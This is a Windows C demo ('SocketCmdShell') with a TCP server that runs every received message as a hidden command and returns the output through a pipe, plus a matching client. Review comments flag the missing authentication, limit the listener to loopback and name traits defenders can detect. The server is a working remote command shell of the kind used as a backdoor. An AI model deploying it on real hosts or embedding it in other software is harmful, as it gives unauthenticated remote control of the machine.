SocketCmdShell
利用匿名管道获取 cmd 命令的执行输出,并通过套接字回传给客户端。服务端对连接不做任何认证,收到的文本会直接作为命令行执行。
Server:
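/*
 * Demo server: accepts one TCP client at a time, treats every received
 * message as a command line, runs it with CreateProcessA and sends the
 * child's stdout/stderr (captured through an anonymous pipe) back to the
 * client.
 *
 * Security review notes:
 *  - There is no authentication, authorization or transport encryption.
 *    Whoever can reach the listening port can run commands with the
 *    privileges of this process. The listener is therefore bound to the
 *    loopback address here (the original listing bound INADDR_ANY); the
 *    client in the same listing connects to 127.0.0.1.
 *  - Traits visible in this code that defenders can look for: a process
 *    listening on TCP 9999 that starts children with a hidden window
 *    (SW_HIDE) and redirected standard handles.
 *  - There is no message framing: one recv() is assumed to hold exactly one
 *    complete command, which TCP does not guarantee.
 */
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#include <Windows.h>
#pragma comment(lib,"ws2_32.lib")

int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    /* Initialise Winsock 2.2. */
    WORD sockVersion = MAKEWORD(2,2);
    WSADATA wsaData;
    if (WSAStartup(sockVersion, &wsaData) != 0) {
        return 0;
    }

    /* Create the listening socket. */
    SOCKET slisten = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (slisten == INVALID_SOCKET) {
        printf("socket error !");
        WSACleanup();
        return 0;
    }

    /* Bind to loopback only: the service executes whatever it receives. */
    struct sockaddr_in sin;
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons(9999);
    sin.sin_addr.S_un.S_addr = htonl(INADDR_LOOPBACK);
    if (bind(slisten, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR) {
        /* The original only printed here and went on to listen(). */
        printf("bind error !");
        closesocket(slisten);
        WSACleanup();
        return 0;
    }

    if (listen(slisten, 5) == SOCKET_ERROR) {
        printf("listen error !");
        closesocket(slisten);
        WSACleanup();
        return 0;
    }

    /*
     * 256 bytes so that a full 255-byte recv() plus the terminator fits.
     * The original declared 255 bytes, cleared 256 and could write the
     * terminator one past the end.
     */
    char revData[256];

    for (;;) {
        struct sockaddr_in remoteAddr;
        int nAddrlen = sizeof(remoteAddr);  /* in/out for accept(): reset per call */
        SOCKET sClient = accept(slisten, (struct sockaddr *)&remoteAddr, &nAddrlen);
        if (sClient == INVALID_SOCKET) {
            /* Do not fall through to recv() on an invalid socket. */
            printf("accept error !");
            break;
        }

        for (;;) {
            memset(revData, 0, sizeof(revData));
            int ret = recv(sClient, revData, (int)sizeof(revData) - 1, 0);
            if (ret <= 0) {
                /* 0 = peer closed, <0 = error. The original spun on 0. */
                break;
            }
            revData[ret] = '\0';

            /* Pipe whose write end the child inherits as stdout/stderr. */
            SECURITY_ATTRIBUTES sa;
            HANDLE hRead = NULL;
            HANDLE hWrite = NULL;
            sa.nLength = sizeof(SECURITY_ATTRIBUTES);
            sa.lpSecurityDescriptor = NULL;
            sa.bInheritHandle = TRUE;
            if (!CreatePipe(&hRead, &hWrite, &sa, 0)) {
                closesocket(sClient);
                closesocket(slisten);
                WSACleanup();
                return 0;
            }
            /* Only the write end should be inherited; keep the read end private. */
            SetHandleInformation(hRead, HANDLE_FLAG_INHERIT, 0);

            STARTUPINFOA si;
            PROCESS_INFORMATION pi;
            memset(&si, 0, sizeof(si));
            memset(&pi, 0, sizeof(pi));
            si.cb = sizeof(si);
            GetStartupInfoA(&si);
            si.hStdError = hWrite;
            si.hStdOutput = hWrite;
            si.wShowWindow = SW_HIDE;
            si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

            /* revData comes straight from the network and is not validated. */
            if (!CreateProcessA(NULL, revData, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
                /* Release both pipe ends; the original leaked them here. */
                CloseHandle(hRead);
                CloseHandle(hWrite);
                send(sClient, "Cmd Error\n", (int)strlen("Cmd Error\n"), 0);
                continue;
            }

            /* Drop our write end so ReadFile sees end-of-pipe when the child exits. */
            CloseHandle(hWrite);

            /*
             * NOTE(review): waiting before draining the pipe means a child
             * that fills the pipe buffer stalls until this 5 s timeout, and
             * a child that never exits keeps ReadFile below blocked (the
             * original author observed the program stopping at the second
             * ReadFile).
             */
            WaitForSingleObject(pi.hProcess, 5000);

            char buffer[1024];
            for (;;) {
                DWORD byteRead = 0;
                if (!ReadFile(hRead, buffer, (DWORD)sizeof(buffer) - 1, &byteRead, NULL) || byteRead == 0) {
                    break;
                }
                /* Send exactly what was read; strlen() would stop at an embedded NUL. */
                if (send(sClient, buffer, (int)byteRead, 0) == SOCKET_ERROR) {
                    break;
                }
            }

            CloseHandle(hRead);
            /* Process and thread handles were never closed in the original. */
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }

        closesocket(sClient);
    }

    closesocket(slisten);
    WSACleanup();
    getchar();
    return 0;
}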
Client:
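/*
 * Demo client: connects to 127.0.0.1:9999, reads a command line from stdin,
 * sends it to the server and prints whatever the server sends back.
 *
 * Review notes:
 *  - Data received from the socket is untrusted. It is printed with fputs(),
 *    never used as a printf format string.
 *  - The protocol has no framing. A reply is considered finished when a
 *    recv() returns fewer than 1023 bytes, so a reply that is an exact
 *    multiple of 1023 bytes, or a command with no output at all, leaves the
 *    client waiting in recv().
 */
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib,"ws2_32.lib")

int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    WORD sockVersion = MAKEWORD(2,2);
    WSADATA data;
    if (WSAStartup(sockVersion, &data) != 0) {
        return 0;
    }

    SOCKET sclient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sclient == INVALID_SOCKET) {
        printf("invalid socket !");
        WSACleanup();
        return 0;
    }

    struct sockaddr_in serAddr;
    memset(&serAddr, 0, sizeof(serAddr));
    serAddr.sin_family = AF_INET;
    serAddr.sin_port = htons(9999);
    serAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    if (connect(sclient, (struct sockaddr *)&serAddr, sizeof(serAddr)) == SOCKET_ERROR) {
        printf("connect error !");
        closesocket(sclient);
        WSACleanup();
        return 0;
    }

    char szSendCmd[256];
    char szReciveResult[1024];
    int connected = 1;

    while (connected) {
        memset(szSendCmd, 0, sizeof(szSendCmd));
        printf("Please Input cmd Command:\n");

        /* fgets() is bounded; the original gets() could overflow szSendCmd. */
        if (fgets(szSendCmd, sizeof(szSendCmd), stdin) == NULL) {
            break;  /* EOF or read error on stdin */
        }
        size_t eol = strcspn(szSendCmd, "\r\n");
        if (szSendCmd[eol] == '\0' && eol == sizeof(szSendCmd) - 1) {
            /* Line did not fit: drop the rest instead of sending a truncated command. */
            int ch;
            while ((ch = getchar()) != '\n' && ch != EOF) {
                /* discard */
            }
            printf("command too long\n");
            continue;
        }
        szSendCmd[eol] = '\0';

        if (strlen(szSendCmd) == 0) {
            continue;
        }
        printf("szSendCmd : %s\n", szSendCmd);

        if (!strcmp(szSendCmd, "exit")) {
            printf("stop shell ^-^ Exit! Please Input Enter\n");
            getchar();
            break;
        }

        if (send(sclient, szSendCmd, (int)strlen(szSendCmd), 0) == SOCKET_ERROR) {
            break;
        }

        for (;;) {
            memset(szReciveResult, 0, sizeof(szReciveResult));
            int iRet = recv(sclient, szReciveResult, (int)sizeof(szReciveResult) - 1, 0);
            if (iRet <= 0) {
                /*
                 * Closed or failed connection. The original indexed the
                 * buffer with iRet, i.e. wrote at [-1] on SOCKET_ERROR.
                 */
                connected = 0;
                break;
            }
            szReciveResult[iRet] = '\0';
            fputs(szReciveResult, stdout);
            if (iRet < 1023) {
                /* A short read ends the reply; this also covers "Cmd Error\n". */
                break;
            }
        }
    }

    closesocket(sclient);
    WSACleanup();
    return 0;
}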